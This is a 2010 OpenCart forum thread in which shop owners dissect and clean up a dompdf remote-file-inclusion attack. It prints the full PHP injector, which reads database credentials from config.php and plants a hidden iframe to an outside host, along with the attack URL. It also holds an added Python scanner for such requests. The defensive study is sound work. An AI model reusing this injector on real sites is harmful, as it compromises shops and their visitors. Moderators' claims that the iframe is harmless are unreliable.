Post by bryngerard » Sun Apr 11, 2010 12:33 pm

Hi all,

Inspecting my access logs revealed that a site had accessed my shop using the following URL:

/artshop/upload/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt

Here is the injected code:

```php
<?php
/*********************************************/
// Payload: a zero-size hidden iframe that loads a third-party URL on every page view.
$INJ = '<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>';
/*********************************************/

error_reporting(0);

// Walk upwards from the current directory until an OpenCart config.php that
// defines DB_HOSTNAME is found and included; this yields the DB credentials.
function findconfig($dir) {
	if ($dh = opendir($dir)) {
		while (($item = readdir($dh)) !== false) {
			if($item != "." && $item != "..") {
				if(is_file($dir . $item) && $item == 'config.php') {
					@include $dir . $item;
					if(defined('DB_HOSTNAME')) {
						return $dir . $item;
					}
				}
			}
		}
		closedir($dh);
		return findconfig($dir . "../");
	}	
}

// Report a status line, remove conf.php and stop.
function halt($str) {
	echo $str;
	unlink('conf.php');
	die;
}

if(!findconfig("./")) {
	halt("<resp>[-] Could not find config.php</resp>");
}

// Connect to the shop database with the credentials taken from config.php.
if(!mysql_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD)) {
	halt("<resp>[-] Could not connect to DB</resp>");
}

if(!mysql_select_db(DB_DATABASE)) {
	halt("<resp>[-] Could not select DB</resp>");
}

// Look up the active theme in the setting table, with and without the table prefix.
$q   = mysql_query("SELECT value FROM " . DB_PREFIX . "setting WHERE `key` = 'config_template' LIMIT 1");
$tpl = mysql_result($q, 0, "value");
if(!$tpl) {
	$q   = mysql_query("SELECT value FROM setting WHERE `key` = 'config_template' LIMIT 1");
	$tpl = mysql_result($q, 0, "value");
	if($tpl) {
		define('PREFIX', '');
	} else {
		halt("<resp>[-] Could not retrieve theme</resp>");
	}
} else {
	define('PREFIX', DB_PREFIX);
}

// Locate the theme's footer template (two possible layouts).
$footer1 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/common/footer.tpl";
$footer2 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/template/common/footer.tpl";
if(file_exists($footer1)) {
	$footer = $footer1;
} elseif(file_exists($footer2)) {
	$footer = $footer2;
} else {
	$footer = false;
}

// If the footer template cannot be written, append the iframe to the welcome or
// description setting in the database instead; otherwise append it to footer.tpl.
if(!$footer || !is_writable($footer)) {
	$q = mysql_query("SELECT `key` FROM " . PREFIX . "setting WHERE `key` = 'config_welcome_1' OR `key` = 'config_description_1' OR `key` = 'config_description_1' LIMIT 1");
	$c = mysql_result($q, 0, "key");
	$q = mysql_query("SELECT value FROM " . PREFIX . "setting WHERE `key` = '$c' LIMIT 1");
	$v = mysql_result($q, 0, "value");
	$r = mysql_query("UPDATE " . PREFIX . "setting SET value = '".addslashes($v . $INJ)."'  WHERE `key` = '$c' LIMIT 1");
	if($r) {
		halt("<resp>[+] Injected! (db)</resp>");
	} else {
		halt("<resp>[-] Could not update db</resp>");
	}
} else {
	$fp = fopen($footer, 'a');
	if($fp) {
		fputs($fp, $INJ);
		fclose($fp);
		halt("<resp>[+] Injected! (file)</resp>");
	} else {
		halt("<resp>[-] Could not write to file</resp>");
	}
}
unlink('conf.php');
die;
```
Can anyone say what this code does?

Bryn


Post by Qphoria » Sun Apr 11, 2010 1:05 pm

This issue was addressed a few days ago.
OpenCart 1.4.6 Update

The script looks like it tries to add iframe code to the dompdf file
to go to this address:

http://adsanalytics.net/in.cgi?2

Which I assume is just to show some ads on your site.

Donate!|OpenCart Basics|GeoZones

Post by bryngerard » Mon Apr 12, 2010 5:09 am

Thanks very much :)


Post by bryngerard » Mon Apr 12, 2010 7:37 pm

Interesting, my shop now connects to http://adsanalytics.net/ whenever a user loads the page.

I am also getting a JScript dialog box telling me my browser is out of date and that I should click to upgrade.
This does not happen every time, so it could be related to something else, but it is a recent phenomenon.

There are five embedded Iframes pointing to http://adsanalytics.net/in.cgi?nn

Does anyone know how to get rid of them?

http://bryngerard.com/artshop/upload for anyone who wants to have a look, although you may be exposing yourself to infection if you visit it. I guess I have to take the shop off-line :(

Regds
Bryn


Post by bryngerard » Mon Apr 12, 2010 8:09 pm

I believe I tracked this down.

The file that gets hacked is /upload/catalog/view/theme/template/YourTemplateName/common/footer.tpl

If you have been hacked, the timestamp for the file will be the day that it happened.

I didn't edit the file, although I have a copy of it if anyone wants it. I just overwrote it with an original copy from the dist. zip, and all *seems* to be OK.

Regards,

Bryn


Post by Daniel » Mon Apr 12, 2010 8:28 pm

Everyone needs to delete dompdf. It's a 3rd-party script that I included to generate PDF invoices. Just remove it. It will not affect the running of your store.

OpenCart®
Project Owner & Developer.


Post by Qphoria » Mon Apr 12, 2010 9:06 pm

It wasn't in footer.tpl for me. The code injected into my welcome message. I had 4 instances in my welcome message. To find it, go to your system settings page and edit your welcome message in SOURCE mode.
Find all instances of

```html
<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>
```

and remove them.

Be sure you remove the system/helper/dompdf/dompdf.php file first to avoid it re-adding

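As an added defender-side example (not code from this thread or from OpenCart), the following Python checks for the two things posters describe: dompdf.php requests whose input_file parameter is a remote URL in the access log, and zero-size hidden iframes appended to footer.tpl or to the welcome/description setting. The log lines, template content, IPs and hosts are constructed samples.

```python
import re
from pathlib import Path

# dompdf.php fetched with an input_file parameter that is itself a URL: the
# remote-inclusion request pattern seen in the access log at the top of the thread.
RFI_RE = re.compile(r'/dompdf\.php\?\S*?input_file=(?:https?|ftp)://', re.IGNORECASE)

# Zero-size iframe, the shape the injected script appends to footer.tpl or to the
# welcome/description setting. Any src host is matched, not only the one in the thread.
HIDDEN_IFRAME_RE = re.compile(
    r'<iframe\b(?=[^>]*\bwidth=["\']?0\b)(?=[^>]*\bheight=["\']?0\b)[^>]*>',
    re.IGNORECASE)

# Constructed combined-format log lines (IPs and hosts are placeholders).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Apr/2010:10:12:01 +0000] "GET /artshop/upload/index.php?route=common/home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Apr/2010:10:12:33 +0000] "GET /artshop/upload/system/helper/dompdf/dompdf.php?input_file=http://attacker.invalid/cfg/conf.txt HTTP/1.1" 200 61',
    '203.0.113.5 - - [11/Apr/2010:10:13:02 +0000] "GET /artshop/upload/system/helper/dompdf/dompdf.php?input_file=invoice.html HTTP/1.1" 200 9001',
]

# Constructed footer.tpl content with two hidden iframes appended after </html>.
SAMPLE_FOOTER = (
    '<div id="footer">Powered By OpenCart</div></body></html>'
    "<iframe width=0 height=0 style='display:none' src=\"http://ads.invalid/in.cgi?2\"></iframe>"
    "<iframe width=0 height=0 style='display:none' src=\"http://ads.invalid/in.cgi?5\"></iframe>"
)

def rfi_requests(log_lines):
    """Return (client_ip, request_path) for each dompdf remote-inclusion attempt.
    A local input_file (third sample line) is a normal invoice render and is not flagged."""
    hits = []
    for line in log_lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)', line)
        if m and RFI_RE.search(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

def hidden_iframes(html):
    """Return every zero-size iframe tag found in a template or setting value."""
    return HIDDEN_IFRAME_RE.findall(html)

def scan_footers(theme_root):
    """Map each footer.tpl under theme_root to its hidden iframes plus the file's
    mtime, since the modified time shows the day the footer was tampered with."""
    report = {}
    for path in Path(theme_root).rglob("footer.tpl"):
        tags = hidden_iframes(path.read_text(errors="replace"))
        if tags:
            report[str(path)] = {"mtime": path.stat().st_mtime, "iframes": tags}
    return report
```

Run `scan_footers("catalog/view/theme")` from the shop root to cover every installed theme, and check the setting values exported from the database with `hidden_iframes` the same way.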

Post by bryngerard » Mon Apr 12, 2010 9:55 pm

It seems that they (the script) have multiple behaviors. I didn't have any in the Welcome!

Anyway, it doesn't seem diff. to disinfect. I checked each page using firebug and I can't find any more.

Bryn


Post by ohmohm » Tue Apr 13, 2010 2:16 am

Site visitors will be infected, or not? Especially spyware that steals Paypal account.


Post by twiggy » Tue Apr 13, 2010 2:41 am

Very worrying, I have been hit by this and I'm on version 1.3.4 which is considered a stable version. Hopefully google will not penalise my site for this.

Would it be easy to update from 1.3.4 up to 1.4.7?



Post by Qphoria » Tue Apr 13, 2010 2:55 am

As I said, it only puts an iframe on your site that displays ads. Relatively harmless and affects nothing outside of the site. Just delete that dompdf file and remove the iframe code from either the footer or the welcome message and you'll be fine.


Post by bryngerard » Tue Apr 13, 2010 5:55 am

I feel I must say that despite all this I am still impressed with OpenCart and this forum.

This kind of thing happens all of the time; entire teams of bright people are employed to look for these weaknesses and exploit them.

Eternal vigilance is the keyword for Internet :)

Bryn


Post by Qphoria » Tue Apr 13, 2010 5:59 am

The important thing to note is that this is not an OpenCart issue. It is the "dompdf" public library script.
http://code.google.com/p/dompdf

OpenCart just chose to use this particular library for upcoming PDF projects. It was just an unlucky choice from the many different PDF scripts available. We will look into a different PDF library class in the future.


Post by maema » Sun Apr 18, 2010 4:25 pm

Hello..

It was in my footer.tpl.

But how can this have happened...
Should I change a password somewhere?
FTP? OpenCart...?


Post by i2Paq » Sun Apr 18, 2010 4:38 pm

maema wrote:
> Hello..
>
> It was in my footer.tpl.
>
> But how can this have happened...
> Should I change a password somewhere?
> FTP? OpenCart...?

Everything you need to know you will find: Here.

Norman in 't Veldt
Moderator OpenCart Forums


Post by maema » Sun Apr 18, 2010 4:58 pm

THX A LOT!
I was really worried... now the dompdf folder is removed FOR EVER!

But who made the dompdf source...? Is there any other potential stuff for hacking?


Post by i2Paq » Sun Apr 18, 2010 5:03 pm

maema wrote:
> THX A LOT!
> I was really worried... now the dompdf folder is removed FOR EVER!
>
> But who made the dompdf source...? Is there any other potential stuff for hacking?

OpenCart is extremely safe, so no worries there.

If you follow the link in the topic I pointed you to you can read all about dompdf.


Post by sunbedman » Sun Apr 25, 2010 4:53 am

Had it on my site too, but Google had seen it as well and put "This site may harm your computer." on the search engine :'(
So I've had to go back to Google and see if they will remove it.
Nice work to you all ;D
